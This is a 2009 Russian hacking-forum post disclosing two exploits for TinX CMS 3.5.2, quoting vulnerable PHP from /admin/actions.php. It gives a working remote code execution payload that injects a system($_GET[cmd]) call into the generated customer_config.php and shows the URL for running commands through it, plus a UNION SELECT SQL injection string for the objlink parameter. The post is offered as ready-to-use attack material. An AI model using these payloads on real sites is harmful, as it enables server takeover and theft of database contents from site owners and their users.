29.12.2009, 00:00
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Product: TinX CMS
Author: cms.tinx.dk
Version: 3.5.2
Need: magic_quotes_gpc = off register_globals=on
Remote Code Executing
File: /admin/actions.php
PHP код:
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["cmsadmin"])) {
//echo "POST(".$_POST["cmsadmin"].")<br>";
$defaultdocumentid = $_POST["defaultdocumentid"];
$language = $_POST["language"];
$appendToTitle = $_POST["appendToTitle"];
$www = $_POST["www"];
$theme = $_POST["theme"];
$theme = $_POST["theme"];
$template = $_POST["template"];
$loginsystem = $_POST["loginsystem"];
$companyName = $_POST["companyName"];
$siteDesign = $_POST["siteDesign"];
$searchresult_quickid = $_POST["searchresult_quickid"];
$contact_quickid = $_POST["contact_quickid"];
$sitemap_quickid = $_POST["sitemap_quickid"];
$max_root_documents = $_POST["max_root_documents"];
//phpinfo();
$d = date("Y-m-d_h-i-s", time());
exec("cp " . $system["DOCUMENT_ROOT"] . "/inc/customer_config.php " . $_SERVER["DOCUMENT_ROOT"] .
"/inc/customer_config_$d.php");
$cfile = $system["DOCUMENT_ROOT"] . "/inc/customer_config.php";
$fh = fopen($cfile, 'w') or die("can't open file: No ACCESS TO FILE OR LIBRARY!!!!!");
$write = <<< html
<?php
/************************************************
Settings that can be changed - TinX/cms
*************************************************/
\$appendToTitle = "$appendToTitle";
\$companyName = "$companyName";
\$language = "$language"; /* da = danish, en=english.... make some up */
\$defaultdocumentid = "$defaultdocumentid"; /* If index.php is launched, this document id is called */
\$searchresult_quickid = "$searchresult_quickid"; /* search page QuickID */
\$contact_quickid = "$contact_quickid"; /* contact page QuickID */
\$sitemap_quickid = "$sitemap_quickid"; /* sitemap page QuickID */
\$max_root_documents = "$max_root_documents"; /* Max number of root elements in menu */
\$www = "$www"; // Url til websitet
\$theme["name"] = "$theme";
\$antalStatus = 2;
\$statusNames[0] = "Aktiv"; /* statusNames indeholder statuskoder for dokumentet - aktiv/inaktiv mv */
\$statusNames[1] = "Inaktiv";
/* Google Webmaster tools */
\$googlesitemap_path = \$www . "/googlesitemap.xml";
/* Show/Hide indtastningsfelter pе settings.php:
Skal feltet skjules intastes en default værdi, ellers "" */
\$settings_options["documenttitle"] = "";
\$settings_options["category"] = "Standard";
\$settings_options["template"] = "$template";
// LOGIN TYPE
\$login_system = "$loginsystem"; //values: phpBB - TinX
// Other settings
\$siteDesign = "$siteDesign";
\$siteDesignPath = "designs/" . \$siteDesign;
\$siteTemplatePath = "designs/" . \$siteDesign ."/templates/";
\$siteContainerPath = "designs/" . \$siteDesign ."/containers/";
if (file_exists(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php"))
include(\$system["DOCUMENT_ROOT"]."\$prefix/inc/customer_vars.php");
else
echo "### ERROR: customer_vars.php NOT FOUND ###";
?>
html;
fputs($fh, $write);
fclose($fh);
Target: {POST} ?cmsadmin=1&appendToTitle=";system($_GET[cmd]);die();
http://yousite.com/inc/customer_config.php?cmd=dir
SQL-inj
File: /admin/actions.php
PHP код:
if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["createobject"]) && $_POST["objectaction"]
=== "create") {
$id = $_POST["docid"];
$type = $_POST["objtype"];
$title = $_POST["objtitle"];
$location = $_POST["objlocation"];
$container = $_POST["objcontainer"];
$objlink = $_POST["objlink"];
$is_copy_of = $_POST["objlinkSubCat"];
if ($type == "existingContent" && $is_copy_of > 0) {
$obj_table = $objlink;
$type = mysql_fetch_array($sqlPtr->selectQuery("file", $tables["object_templates"],
"tablename='$objlink'"));
$type = $type[0];
$insert_as_copy = true;
} else {
$insert_as_copy = false;
$objlink = "";
$is_copy_of = "0";
}
$sqlPtr->selectQuery();
PHP код:
function selectQuery($what, $tablename, $where="", $other="")
{
//echo "Lookup: " . $this->antalLookups . "<br>";
$this->antalLookups++;
// $this->makeConnection();
if(strcmp($where,"") != 0)
$where = "WHERE $where";
$q = "SELECT $what FROM $tablename $where $other";
//echo "Q($q)\n";
if($this->isDebug){
echo "Query($q)<br>\n";
echo "HOST($this->dbhost)<br>\n";
echo "USER($this->dbusername)<br>\n";
echo "PASS($this->dbuserpassword)<br>\n";
echo "DB($this->default_dbname)<br>\n";
}
$result= mysql_query($q);
if(!$result)
$this->error_message($this->sql_error() . "<br><b>selectQuery($q) error</b>: $delete connected but not to table" );
// $this->closeConnection();
return $result;
}
Target: {POST} ?objectaction=create&objectcreate=1&objlinkSubCat= 1&objtype=existingContent&objlink=1'+union+select+ 1,2,3,4,5/*
Последний раз редактировалось m0Hze; 29.12.2009 в 13:12..
|
|
|